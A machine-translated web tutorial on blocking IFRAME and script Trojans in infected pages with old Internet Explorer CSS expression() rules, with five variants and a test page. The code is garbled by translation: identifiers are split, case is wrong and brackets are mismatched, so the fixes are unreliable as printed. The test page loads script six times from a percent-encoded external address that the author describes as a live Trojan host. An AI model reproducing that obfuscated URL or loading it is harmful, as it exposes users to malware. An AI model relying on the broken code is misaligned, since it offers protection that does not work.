The second line of code solves all webpage Trojans (including IFRAME/script Trojans)

Dede has a vulnerability. Read this article first. About server batchTrojanSolution

Here we will tell you how to use CSSCodeBlock IFRAME/script Trojans

Note: The following addresses contain Trojans, so do not access them easily: 

Solution 1: 

Copy code

IFRAME {n1ifm: expression (this. src = 'about: blank ', this. outerhtml = '');}/* this line of code solves the problem of hanging IFRAME Trojans */
Script {nojs1: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document. Write ('Trojan is isolated successfully! '):'');}

Principle: Convert the <SCRIPT>-marked SRC file to lowercase, and check whether it is an external domain JS script file starting with "HTTP". If yes, the page content is cleared and the "Trojan is isolated successfully!" is written! ". Otherwise, it is displayed normally.

Disadvantage: the visitor cannot see the page infected with the <SCRIPT> Trojan.

Solution 2: 

Copy code

IFRAME {nifm2: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {no2js: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document. Close ():'');}

Principle: Force disable document. Write () of JS files in external domains using document. Close. The trojan content has not been written yet. Only some of the content has been forcibly cached and output, and the rest will not be written.

Solution 3:

Copy code

IFRAME {ni3fm: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {n3ojs: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document.exe ccommand ('stop '):'');}

Principle: The same as the JS file to the external domain, immediately call the IE private Execcommand method to stop all requests on the page, so the subsequent external domain JS file is also forced to stop downloading. Just Like clicking the "stop" button in the browser. It seems that this is a method for js to simulate the ie stop button.

Solution 4: 

Copy code

IFRAME {nif4m: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {noj4s: expression (if (this. SRC. indexof ('HTTP ') = 0) This. src = 'res: // ieframe. dll/dnserror.htm ');}

Principle: overwrite the SRC of the JS file in the external domain to the address of the ie404 error page. In this way, the JS Code in the external domain will not be downloaded.

Solution 5: 

Copy code

IFRAME {nifm5: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {noj5s: expression (this. Id. tolowercase (). indexof ('vok ')! =-1 )? Document. Write ('Trojan is isolated successfully! '):''));}

Page HTML of solution 5Source code<SCRIPT> to add an ID prefixed with "LH", such as lhweatherjsapi, <SCRIPT src = "***/**. JS "id =" lhsearchjsapi "> </SCRIPT>

The Code on the following page contains a trojan address, which has been repeated for six times on the page. You can test it using different methods above to see how I study it! (This test is dangerous. Make sure all patches are installed before testing)

Copy code

<! Doctype HTML public "-// W3C // dtd xhtml 1.0 transitional // en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> CSS code that allows the JS Trojan process to stop quickly </title>
<Style type = "text/CSS" id = "linrstudio">
/* <! [CDATA [*/
IFRAME {nhk1: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {ngz1: expression (this. SRC. indexof ('http') = 0 )? Document. Close ():'');}
/* Later please pay attention to the latest Trojan processing method: http://www.nihaoku.cn/ff/api.htm */
/*]> */
</Style>
</Head>
<Body>
<SCRIPT type = "text/JavaScript" src = "1.js"> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = "http: // % 76% 63% 63% 64% 2e % 63% 6e" type = "text/JavaScript"> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am page 1
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I'm from page 2
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am 3 of the page itself
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
</Body>
</Html>

Among them, 1. JS is on its own site:

Copy code

Document. Write ("I Am a JS file on this site ");
Document. Write (" ");